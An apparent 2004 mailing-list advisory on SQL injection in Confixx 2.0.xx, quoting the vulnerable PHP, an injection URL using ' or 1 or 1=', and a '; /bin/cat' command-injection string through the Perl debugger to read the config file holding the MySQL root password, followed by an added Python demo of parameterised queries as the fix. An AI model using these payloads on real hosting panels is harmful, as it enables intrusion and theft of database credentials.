Message-ID: <20040309092447.2871.qmail@mail.krefeld.schulen.net>
From: checker at mail.krefeld.schulen.net (checker@...l.krefeld.schulen.net)
Subject: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW

SQL-Injections in Confixx 2.0.xx // reading MySQL Root-PW

include("auth.php");
db_connect($db_host, $db_user, $db_pass);
$id = db_query("select count(datenbank) as mysql from mysql_datenbanken where kunde = '$PHP_AUTH_USER'");
$werte = db_fetch_array($id);
$mysql = $werte["mysql"];
$id = db_query("select dbname from mysql_datenbanken where kunde = '$PHP_AUTH_USER' and datenbank = '$db'");
--------------------------------^^^^^^^^^
$db --> unchecked Value
____

/user/db_mysql_loeschen2.php?db=1

SELECT db FROM sqldb WHERE user='$USER' AND db='$formular_wert'

using: ' or 1 or 1='

the SQL query looks like:
SELECT db FROM sqldb WHERE user='$USER' AND db='' or 1 or 1=''

/user/db_mysql_loeschen2.php?db=' or 1 or 1='
______

Confixx Perl Debugger

using: ; /bin/cat location_of_Confixx_config_file
to read the config with MySQL Root-PW
_______

wkr
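Added example, not part of the original post and not Confixx code: the second query from the quoted script, built by string concatenation and then with bound parameters, run against the value given in the post. It assumes Python with an in-memory SQLite table standing in for PHP and MySQL, constructed sample rows, hypothetical function names, and that `db` is a short decimal id as in `?db=1`.

```python
import sqlite3

# Constructed sample rows; table and column names are the ones in the quoted script.
ROWS = [
    ("web1", "usr_web1_1", "1"),
    ("web1", "usr_web1_2", "2"),
    ("web2", "usr_web2_1", "1"),
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mysql_datenbanken (kunde TEXT, dbname TEXT, datenbank TEXT)")
    conn.executemany("INSERT INTO mysql_datenbanken VALUES (?, ?, ?)", ROWS)
    return conn

def lookup_concatenated(conn, kunde, db):
    # Same construction as the quoted script: the request value becomes SQL text.
    sql = ("select dbname from mysql_datenbanken "
           f"where kunde = '{kunde}' and datenbank = '{db}'")
    return sorted(row[0] for row in conn.execute(sql))

def lookup_bound(conn, kunde, db):
    # Placeholders: the value is only ever compared as data, never parsed as SQL.
    sql = "select dbname from mysql_datenbanken where kunde = ? and datenbank = ?"
    return sorted(row[0] for row in conn.execute(sql, (kunde, db)))

def lookup_validated(conn, kunde, db):
    # Assumption: db is a short decimal id, as in "?db=1". Reject anything else.
    if not (db.isascii() and db.isdigit() and len(db) <= 4):
        raise ValueError("db must be a short decimal id")
    return lookup_bound(conn, kunde, db)

if __name__ == "__main__":
    conn = make_db()
    crafted = "' or 1 or 1='"  # the value quoted in the post
    print("concatenated:", lookup_concatenated(conn, "web1", crafted))
    print("bound:       ", lookup_bound(conn, "web1", crafted))
    try:
        lookup_validated(conn, "web1", crafted)
    except ValueError as exc:
        print("validated:    rejected,", exc)
```

Because AND binds tighter than OR, the concatenated form drops both the `kunde` and the `datenbank` restriction, which is why it returns rows belonging to other customers.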